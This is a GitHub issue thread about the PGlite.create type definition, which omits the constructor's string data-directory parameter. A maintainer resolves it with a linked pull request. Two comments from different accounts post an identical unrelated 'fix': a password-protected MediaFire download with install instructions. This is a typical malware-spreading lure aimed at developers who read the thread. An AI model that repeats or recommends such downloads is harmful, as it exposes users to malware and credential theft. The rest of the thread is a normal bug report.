### ISSUE TITLE
PGlite.create definition does not include string parameter

### ISSUE THREAD

**Issue by jamesgpearce** [electric-sql/pglite#268]
Probably an easy one to fix. Let me know if you want me to have a go.

`create` says it only takes options:

```
static async create<O extends PGliteOptions>(
  options?: O,
): Promise<PGlite & PGliteInterfaceExtensions<O['extensions']>> {
  const pg = new PGlite(options)
    ...
```

And yet it could take a string, then options:

```
constructor(
  dataDirOrPGliteOptions: string | PGliteOptions = {},
  options: PGliteOptions = {},
) {
  if (typeof dataDirOrPGliteOptions === 'string') {
...
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by msfstef** [comment]
Good catch! Addressed by https://github.com/electric-sql/pglite/pull/275

**Comment by jamesgpearce** [comment]
Beautiful. On 🔥 as usual.
